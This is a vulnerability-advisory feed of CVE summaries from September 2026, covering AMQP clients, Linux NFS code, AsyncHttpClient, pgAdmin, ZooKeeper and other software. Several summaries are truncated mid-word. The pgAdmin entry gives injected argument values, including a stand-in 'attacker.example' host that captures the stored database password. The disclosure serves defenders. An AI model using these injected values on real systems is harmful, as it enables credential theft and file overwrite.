  • Sep 17, 2026Improper validation of certificate with host mismatch in the MQTT client TLS connection layer in AWS IoT Device SDK for Python 1.5.3 through 1.6.0 on Python 3.7CVE-2026-92943 · Other software · AWS · reported by ff89ba41-3aa1-4d27-914a-91399e9639e5Critical 9.2

Improper validation of certificate with host mismatch in the MQTT client TLS connection layer in AWS IoT Device SDK for Python 1.5.3 through 1.6.0 on Python 3.7 and later might allow an adversary-in-the-middle actor to impersonate the AWS IoT Core endpoint, read device telemetry, and inject arbitrary MQTT messages that the device processes as authentic, via a certificate issued for an unrelated hostname by a certificate authority present in the device trust store. To remediate this issue, users should upgrade to version 1.6.1.

  • Sep 17, 2026rabbitmq-c is a C-language AMQP client library for RabbitMQ.CVE-2026-44236 · Other software · alanxz · reported by GitHubHigh 7.1

rabbitmq-c is a C-language AMQP client library for RabbitMQ. Prior to 0.16.0, a malicious AMQP server can send an undersized connection.tune.frame_max value during amqp_login(), and rabbitmq-c accepts the value in amqp_login_inner() in librabbitmq/amqp_socket.c. amqp_tune_connection() in librabbitmq/amqp_connection.c uses frame_max to reallocate the outbound buffer without enforcing AMQP_FRAME_MIN_SIZE. Immediate serialization of connection.tune-ok through amqp_frame_to_bytes() writes beyond the undersized heap allocation, causing memory corruption and likely denial of service. An on-path attacker can also trigger the flaw against plaintext AMQP traffic. Code execution is theoretically possible but was not demonstrated. This issue is fixed in version 0.16.0.

  • Sep 17, 2026rabbitmq-c is a C-language AMQP client library for RabbitMQ.CVE-2026-44235 · Other software · alanxz · reported by GitHubMedium 6.5

rabbitmq-c is a C-language AMQP client library for RabbitMQ. Prior to 0.16.0, a malicious AMQP server can send an undersized HEADER or METHOD frame during client login and cause unsigned size_t underflow in amqp_handle_input() in librabbitmq/amqp_connection.c. The parser subtracts HEADER_SIZE, fixed per-frame fields, and FOOTER_SIZE from state->target_size without first checking the minimum frame length. The wrapped encoded.len value is passed through amqp_decode_properties() to amqp_decode_table_internal(), where it defeats bounds checks and causes an out-of-bounds read and process crash. An on-path attacker can also trigger the issue when AMQP traffic is not protected by TLS with certificate validation. The demonstrated impact is denial of service, with no reliable memory disclosure or code execution shown. This issue is fixed in version 0.16.0.

In the Linux kernel, the following vulnerability has been resolved: dmaengine: dw-edma: Terminate all descriptors without callbacks The DMA Engine client documentation says in the "Terminate APIs" section of Documentation/driver-api/dmaengine/client.rst: "No callback functions will be called for any incomplete transfers." dw-edma instead calls vchan_cookie_complete() when a deferred STOP reaches the interrupt handler. This schedules a callback for the active descriptor and leaves other issued or submitted descriptors queued. A late callback after dmaengine_terminate_sync() can dereference client state that has already been freed, while leftover descriptors may later restart into reused buffers or leak. Move all issued and submitted descriptors to the terminated list whenever termination completes. For a pending STOP, do this from both the DONE and ABORT paths. Complete their cookies in order without scheduling callbacks. A STOP can remain pending until the running transfer raises an interrupt. Make device_synchronize() wait for such a pending STOP to complete before releasing terminated descriptors. Reuse it from free_chan_resources(), then release the remaining virt-dma reso

  • Sep 17, 2026In the Linux kernel, the following vulnerability has been resolved: NFS: Return a delegation the client fails to record When an NFS server grants a delegationCVE-2026-90234 · Computers, phones & browsers · Linux · reported by 416baaa9-dc9f-4396-8d5f-8c081fb06d67High 7.5

In the Linux kernel, the following vulnerability has been resolved: NFS: Return a delegation the client fails to record When an NFS server grants a delegation in an OPEN reply, nfs_inode_set_delegation() records it on the client. However, three of its error flows return without sending DELEGRETURN. A delegation can be relinquished only by DELEGRETURN (RFC 8881 Section 20.2.4), so dropping one silently leaves the server believing the client still holds it. If the server happens to recall that delegation, the client answers CB_RECALL with NFS4ERR_BADHANDLE because it has no record of the stateid. The server revokes the delegation and moves it onto its cl_revoked list, because the client never sends the FREE_STATEID that would drain it. Every subsequent SEQUENCE reply then carries SEQ4_STATUS_RECALLABLE_STATE_REVOKED, and the client's state manager loops issuing TEST_STATEID across its delegations without ever clearing the condition. The window is easy to reach now that a server offers a write delegation on any write OPEN: a delegation recalled for one opener races a re-open that the server answers with a fresh write delegation. Instead of dropping it, hand the delegation back du

  • Sep 17, 2026In the Linux kernel, the following vulnerability has been resolved: NFSv4: remove callback IDR entry on client allocation failure nfs4_alloc_client() allocateCVE-2026-90151 · Computers, phones & browsers · Linux · reported by 416baaa9-dc9f-4396-8d5f-8c081fb06d67Critical 9.8

In the Linux kernel, the following vulnerability has been resolved: NFSv4: remove callback IDR entry on client allocation failure nfs4_alloc_client() allocates an NFSv4.0 callback identifier before it finishes setting up the client. If any later initialization step fails, the error path frees the nfs_client directly with nfs_free_client(). That bypasses nfs_put_client(), which is where the callback IDR entry is removed during normal teardown. A failed allocation can therefore leave cb_ident_idr pointing at a freed nfs_client. A later NFSv4.0 callback lookup by cb_ident would find the stale pointer and take a reference to it. Make the callback IDR removal helper callable by the allocation failure path, and remove the callback identifier before freeing the client. This was found by a local static-analysis checker for publish-before-free lifetime bugs and confirmed by manual inspection.

    In the Linux kernel, the following vulnerability has been resolved: smb: client: fix request buffer leak in smb2_new_read_req() smb2_new_read_req() allocates the request buffer with smb2_plain_req_init() but only publishes it to the caller with *buf = req at the very end of the function. Two error returns sit in between: rc = smb2_plain_req_init(SMB2_READ, io_parms->tcon, server, (void **) &req, total_len); if (rc) return rc; if (server == NULL) return -ECONNABORTED; [...] rdata->mr = smbd_register_mr(server->smbd_conn, &rdata->subreq.io_iter, true, need_invalidate); if (!rdata->mr) return -EAGAIN; On either of them the buffer is neither released nor handed back, so it is leaked. The caller cannot clean up after it: smb2_async_readv() does 'goto out' on a non-zero return, which skips the cifs_small_buf_release(buf) at async_readv_out, and buf has not been assigned at that point in any case. The write path has never had this problem. smb2_async_writev() registers the memory region inline and jumps to its release label instead of returning: wdata->mr = smbd_register_mr(...); if (!wdata->mr) { rc = -EAGAIN; goto async_writev_out; }

  • Sep 17, 2026The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses.CVE-2026-85720 · Other software · AsyncHttpClient · reported by GitHubMedium 5.9

The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 2.0.0 until 2.16.1 and 3.0.12, a request using an HTTP proxy to reach an HTTPS origin can expose preemptive origin credentials because NettyRequestFactory and NettyRequestSender.sendRequestWithNewChannel attach Authorization to the plaintext CONNECT request before the TLS tunnel exists. Basic or Digest credentials and per-connection NTLM, Kerberos, or SPNEGO tokens intended for the origin are therefore visible to the proxy and to observers on the client-to-proxy hop. The tunneled request still receives origin Authorization after the tunnel is established, while Proxy-Authorization remains on CONNECT for its intended proxy recipient. This issue is fixed in versions 2.16.1 and 3.0.12.

  • Sep 17, 2026The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses.CVE-2026-85716 · Other software · AsyncHttpClient · reported by GitHubLow 3.7

The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 3.0.8 until 3.0.12, processScramAuthenticationInfo and processAuthenticationInfo compute the SCRAM ServerSignature or Digest rspauth verification result but log a mismatch and still deliver the response as authenticated. On a non-TLS or compromised transport, a peer that has not proved knowledge of the shared secret can therefore be accepted as the server. The fix rejects a present invalid value and computes Digest rspauth from the Authorization parameters actually sent, but verification remains unenforced when the value is absent, the sent parameters cannot be recovered, or Digest uses qop=auth-int. This issue is fixed in version 3.0.12.

  • Sep 17, 2026pgAdmin 4's Backup tool appended the client-supplied 'database' field from the /backup/job/<sid>/object request to the pg_dump argument vector as a bare trailinCVE-2026-86864 · Other software · pgadmin.org · reported by f86ef6dc-4d3a-42ad-8f28-e6d5547a5007High 8.7

pgAdmin 4's Backup tool appended the client-supplied 'database' field from the /backup/job/<sid>/object request to the pg_dump argument vector as a bare trailing positional argument, without validation. Because pg_dump parses its options with getopt_long, which permutes arguments, a value beginning with a dash was interpreted as an option rather than as a database name. A value such as --file=/absolute/path therefore overrode the storage-confined --file that pgAdmin had constructed earlier, causing pg_dump to write its output anywhere the pgAdmin process could write, outside the user's File Manager storage directory. This yields arbitrary file creation and overwrite as the operating-system account running pgAdmin, which can destroy pgAdmin's own configuration database and, depending on the target chosen, be escalated further. The same field additionally permitted connection-string injection. libpq expands a database name containing an equals sign into a full connection string, and keywords embedded there override the --host and --port that pgAdmin passes, so a value such as 'host=attacker.example port=5432 dbname=x' redirected pg_dump to a server of the attacker's choosing. pgAdmin 4's Restore and Maintenance tools passed the client-supplied 'database' field directly as the value of the --dbname option given to pg_restore and psql. libpq expands a database name containing an equals sign into a full connection string, and connection keywords embedded in that value take precedence over the --host and --port arguments that pgAdmin supplies. A value such as 'host=attacker.example port=5432 dbname=x' therefore redirected the utility to a server chosen by the requesting user rather than the server the operation was invoked against. Because pgAdmin exports the decrypted stored database password in the PGPASSWORD environment variable before executing the utility, the redirected connection presents that credential to the attacker-nominated endpoint, which may capture it. The redirection additionally permits outbound connections from the pgAdmin host to arbitrary network addresses, including hosts not otherwise reachable by the requesting user. The behaviour is reachable by any authenticated user holding the tools_restore or tools_maintenance permission, both of which the default User role grants. The Maintenance tool was not affected in the earliest releases,

  • Sep 17, 2026The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses.CVE-2026-85721 · Other software · AsyncHttpClient · reported by GitHubHigh 7.5

The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 2.0.0 until 2.16.1 and 3.0.12, automatic response decompression on the HTTP/1.1 path uses ChannelManager.newHttpContentDecompressor() to install Http1ContentDecompressor without a cumulative output-size limit. A hostile or compromised server, or an attacker who can alter a response in transit, can send a small gzip, deflate, or snappy response that expands across chunks until the client exhausts its heap and raises OutOfMemoryError; brotli and zstd are also affected when their optional codecs are present. In versions 3.0.8 through 3.0.10, the HTTP/2 decompressor is also unbounded, so switching protocols does not mitigate the issue on those releases. A limit applied to each decode call is insufficient because the response can be delivered as many small chunks, so the fixed implementation tracks total decompressed bytes for the whole response. This issue is fixed in versions 2.16.1 and 3.0.12.

  • Sep 17, 2026The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses.CVE-2026-85719 · Other software · AsyncHttpClient · reported by GitHubHigh 7.5

The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 2.1.0 until 2.16.1 and 3.0.12, requests using an authenticated SOCKS proxy can expose the proxy's credentials to the origin because NettyRequestFactory and NettyRequestSender attach Proxy-Authorization without confirming that the request is being sent to an HTTP proxy. With preemptive proxy authentication, the header is attached to a plaintext HTTP request, exposing credentials such as directly reversible Basic credentials to the origin. With the default non-preemptive flow, a hostile origin can return a 407 response and ProxyUnauthorized407Interceptor sends the proxy credentials through the existing SOCKS tunnel, including NTLM, Kerberos, and SPNEGO credentials. Releases before 2.1.0 lack SOCKS proxy support. This issue is fixed in versions 2.16.1 and 3.0.12.

  • Sep 17, 2026The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses.CVE-2026-85718 · Other software · AsyncHttpClient · reported by GitHubMedium 5.9

The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 3.0.8 until 3.0.12, a client with maxConnections or maxConnectionsPerHost set above zero leaks one connection permit whenever TLS connection establishment fails before the handshake completes. NettyConnectListener removes the partitionKeyLock permit from NettyResponseFuture before every failure path is bound to the channel closeFuture, so an abort can leave the permit unreleased. Repeated failures can permanently lock out one host under a per-host limit or drain the shared pool under a global limit, blocking later requests even when no connection remains open. The default unlimited connection setting is not affected. This issue is fixed in version 3.0.12.

The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 2.14.5 to 2.16.0 and from 3.0.9 to 3.0.11, a client configured with a client-wide Realm and redirect following can disclose credentials after a cross-origin redirect because the Interceptors authentication path falls back to the client configuration after redirect handling clears the per-exchange realm. If the attacker-controlled target returns 401, the client can send Basic or Digest credentials or a Negotiate or NTLM token to that origin. Per-request realms are stripped correctly, and this issue is a residual bypass of the earlier cross-origin credential-stripping fixes. This issue is fixed in versions 2.16.1 and 3.0.12.

Use of a One-Way Hash with a Predictable Salt vulnerability in team-alembic AshAuthentication allows readers of the audit store to recover the client IP addresses that the audit log add-on's :hash privacy mode is meant to pseudonymise. AshAuthentication.AddOn.AuditLog.IpPrivacy.hash_ip/1 computes a single unkeyed :crypto.hash(:sha256, salt <> ip) and truncates the result to 16 hexadecimal characters. The salt is read from the :audit_log_ip_salt or :secret application config keys, and falls back to the constant "default-salt-change-in-production" published in the library source when neither is set, with nothing warning that the default is in use. The IPv4 space is only 2^32 values and SHA-256 is fast, so the whole hash table is precomputable and every stored value maps back to its source address. Truncating to 16 characters does not help, and even a configured salt leaves the hash cheap enough to enumerate once it leaks. This issue affects ash_authentication: from 4.12.0 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.

Apache NiFi 1.5.0 through 2.11.0 provide REST API methods that replace the entire contents of a Process Group using a client-supplied flow definition, covering Process Group flow replacement together with versioned flow update and rebase operations. Framework authorization for these methods was limited to read and write privileges on the Process Group itself, unlike the corresponding asynchronous update request methods, which also authorize the components encapsulated in the Process Group along with referenced Controller Services, Parameter Contexts, and Parameter Providers. As a result of the missing authorization, an authenticated user with write access to a Process Group could supply a flow definition that modifies or removes components in descendant Process Groups protected by more restrictive access policies, and could bind components to Controller Services and Parameter Contexts without authorization for those referenced components. Existing verification checks limited the impact to stopped components, and the issue applies only to deployments that use component-level authorization policies, because the framework enforces write permissions as the security boundary. AsyncSSH is a Python package which provides an asynchronous client and server implementation of the SSHv2 protocol on top of the Python asyncio framework. Prior to 2.24.0, _process_channel_open and _process_channel_open_confirmation in asyncssh/connection.py accept a peer-supplied send_pktsize value of zero. The RabbitMQ Java client library allows Java and JVM-based applications to connect to and interact with RabbitMQ nodes. Prior to 5.34.0, AMQConnection.start() applies Math.min(maxInboundMessageBodySize, frameMax) after Connection.Tune negotiation even though AMQP defines frameMax value zero as unlimited and ConnectionFactory.DEFAULT_FRAME_MAX is zero. When the client default and server-negotiated value are both zero, the result is passed to Utils.framePayloadLimit(int), which interprets zero as Integer.MAX_VALUE and disables the configured maxInboundMessageBodySize cap. A malicious AMQP server, or a man-in-the-middle attacker able to modify Connection.Tune and inject frames into the connection, can then send an oversized frame of any frame type, causing Frame.readFrom() to allocate a large byte array before content-level validation and potentially terminate the client process through memory exhaustion. @fastify/proxy-addr is a Fastify plugin that determines a request's client address behind trusted reverse proxies, and it backs Fastify request.ip and request.ips. In versions 3.0.0 through 5.1.0, a trust subnet written in IPv4-mapped IPv6 notation with an IPv4-sized prefix, such as ::ffff:10.0.0.0/8 instead of the correct ::ffff:10.0.0.0/104, is accepted without error but trusts every IPv4 address on the internet rather than the block it names. Because the socket peer then becomes trusted at hop 0, any unauthenticated client can supply an arbitrary X-Forwarded-For header and control the address the application reads, which defeats IP-based access control, rate limiting, geolocation, and audit logging. The plugin inherited this defect from the upstream proxy-addr module (CVE-2026-90711). The issue is fixed in @fastify/proxy-addr 5.1.1, and users should upgrade to 5.1.1 or later. As a workaround, ensure any IPv4-mapped IPv6 trust subnet uses a prefix length of at least 97, or express the range in plain IPv4 notation.

react/http is an event-driven, streaming HTTP client and server implementation for ReactPHP. From 0.6.0 until 1.11.1, React\Http\Io\ChunkedDecoder could enter an infinite loop while processing a malformed Transfer-Encoding: chunked body because handleData required its buffer to shrink on every iteration. An incomplete terminal-chunk trailer without CRLF left the buffer unchanged after strpos returned false, and exactly two non-CRLF bytes after a completed non-terminal chunk bypassed both the error and wait guards. The affected decoder processes request bodies for React\Http\HttpServer and response bodies for React\Http\Browser, allowing a malicious client to freeze a server or a malicious or compromised server to freeze a client. A reverse proxy that normalizes inbound requests may protect the server direction but does not protect outbound Browser requests. This issue is fixed in version 1.11.1.

RabbitMQ amqp091-go is a Go AMQP 0.9.1 client. Prior to 1.13.0, readField in read.go reads the length of an AMQP byte-array field with type tag x into a signed int32 and passes the value directly to make when allocating the field buffer. A malicious or compromised broker can encode a value such as 0xFFFFFFFF, which becomes -1 and causes a len out of range runtime panic. The panic escapes the network reader goroutine and terminates the client process, including during connection.start server properties or message header table parsing. RabbitMQ amqp091-go is a Go AMQP 0.9.1 client. Prior to 1.13.0, readLongstr in read.go returns an empty string and a nil error when a declared AMQP longstr length exceeds 0x7FFFFFFF instead of returning ErrSyntax. The function leaves the declared field bytes unread, while readTable treats the operation as successful and continues parsing from the wrong offset. A malicious or compromised broker can provide an oversized longstr in a table field and desynchronize subsequent AMQP parsing, causing attacker-controlled trailing bytes to be interpreted as later fields or frames and disrupting connection integrity and availability. This issue is fixed in version 1.13.0.

In the Linux kernel, the following vulnerability has been resolved: NFSD: Prevent client use-after-free during export state revocation nfsd4_revoke_export_states() has the same use-after-free as nfsd4_revoke_states(): it drops nn->client_lock across revoke_one_stid() and the following read of clp->cl_minorversion, but the stateid reference it holds does not pin the client. A teardown racing the dropped lock can free the client while revoke_one_stid() still dereferences it. exportfs -u drives this path through NFSD_CMD_UNLOCK_EXPORT, so an administrator removing an export can race a client expiry. Skip a client that is already expiring and otherwise pin it with cl_rpc_users under client_lock before dropping the lock, matching nfsd4_revoke_states().

In the Linux kernel, the following vulnerability has been resolved: NFSD: Prevent client use-after-free during close_lru reaping An nfs4_openowner left on nn->close_lru after its final CLOSE keeps its last closed stateid in oo_last_closed_stid, holding only a raw pointer to its nfs4_client. The laundromat reaps timed-out entries, drops nn->client_lock, and calls nfs4_put_stid(), which dereferences the client through cl_lock. Nothing pins the client across that window, so a concurrent force_expire_client() can free it and nfs4_put_stid() reads freed memory. __destroy_client() hits the same race, walking clp->cl_openowners without cl_lock. Pin the client with cl_rpc_users before dropping client_lock, and skip clients already expiring. __destroy_client() then cleans up its own close_lru entries through release_last_closed_stateid(), so teardown no longer races the laundromat.

In the Linux kernel, the following vulnerability has been resolved: NFSD: Prevent client use-after-free during blocked-lock reaping A bare lock owner -- its only remaining reference a blocked lock on nn->blocked_locks_lru -- holds a raw pointer to its nfs4_client but no reference keeping the client alive. When the per-net laundromat reaps such a lock, freeing the nbl drops the owner reference held through flc_owner, and the final nfs4_put_stateowner() takes the client's cl_lock. Because the laundromat detaches the nbl first, __destroy_client() no longer finds it, so a concurrent force_expire_client() can free the client before nfs4_put_stateowner() runs, dereferencing cl_lock in freed memory. Pin the client with cl_rpc_users before dropping nn->blocked_locks_lock, and skip clients already expiring, whose blocked locks __destroy_client() frees while holding an owner reference. Take nn->client_lock outside nn->blocked_locks_lock. Every other site holds nn->blocked_locks_lock as a leaf, acquiring no further lock, so placing nn->client_lock outside it cannot form a lock-order cycle.

The `deleteContainer` opcode (0x14/20) is processed without verifying the caller's ACL permissions, allowing any authenticated client to delete specific znodes in the data tree regardless of the ACL restrictions on the znode or its parent. This opcode is considered internal-only and the official client doesn't have API for it, but a client that can open a plain TCP session on the ZooKeeper client port (2181 by default) - with NO authentication and NO ACL permissions - can delete any empty persistent znode (including regular persistent nodes, container nodes, and TTL nodes) by issuing the raw protocol OpCode deleteContainer (20). The deleteContainer request path completely skips both the session check and the DELETE ACL check that are enforced by the regular delete (OpCode 2) path. This is an authorization bypass / ACL enforcement bug. Apache Airflow Keycloak provider: the unauthenticated token endpoint accepts a client-credentials grant for any confidential client registered in the Keycloak realm, not only the client configured for Airflow. No allowlist restricts which client ids may authenticate, so the credentials of an unrelated application that happens to share the realm are valid Airflow login credentials, and Airflow mints a signed session token for that application's service account. The endpoint also answers unauthenticated credential guesses against Keycloak under Airflow's identity. Affects deployments using the Keycloak auth manager whose realm is shared with other confidential clients. The attacker needs valid credentials for any one of those clients, not for Airflow. Resource authorization is still evaluated per subject, so the access gained is whatever that service account holds, plus any endpoint gated only on being authenticated. Users of apache-airflow-providers-keycloak are recommended to upgrade to version 0.10.0 or later, which accepts only the configured client on that grant.

Use of Cache Containing Sensitive Information in ZenHive mpp allows a shared HTTP cache to store a paid response and serve it to clients that never paid. MPP.Plug.verify_credential in lib/mpp/plug.ex sets payment-receipt and cache-control: private on the connection before the wrapped application runs, and registers no register_before_send/2 callback. Plug.Conn.put_resp_header/3 replaces an existing header, so a mounting application that sets its own cache-control on the paid resource (for example public, max-age=3600) silently overrides the private the library relies on, and a CDN or reverse proxy can then store the paid 200 together with its Payment-Receipt and serve both to unpaid clients. The library-level guarantee is therefore defeatable by the application it protects. For the same reason a downstream non-2xx response still carried Payment-Receipt, issuing a receipt for a response that delivered no resource. This issue affects mpp: from 0.1.0 before 0.16.2.

Improper Validation of Unsafe Equivalence in Input in ZenHive mpp allows an unauthenticated remote client to pass the Tempo duplicate-submission gate twice with one signed transaction. MPP.Methods.Tempo reserves the pre-broadcast dedup slot on the caller-supplied hex in reserve_hash_atomic/2, keyed through store_key/1 on tx.raw rather than on a canonical form of the transaction. The deserializer stores the caller's hex verbatim and accepts both recovery-id encodings, so one signed transaction submitted once with v=27 and once with v=0 yields two distinct reserve keys, and both pass the reserve and reach the broadcast path. The plug-level credential replay store is deliberately carved out for tempo in lib/mpp/replay.ex, leaving this reserve as the only gate, and the post-broadcast mark writes the canonical hash key that the raw-keyed reserve never reads. What the duplicate submission yields depends on the node: a nonce-reuse rejection fails closed, while a node that answers with the canonical hash for an already-known transaction returns a second valid Payment-Receipt for a single on-chain payment. This issue affects mpp: from 0.2.0 before 0.16.2.
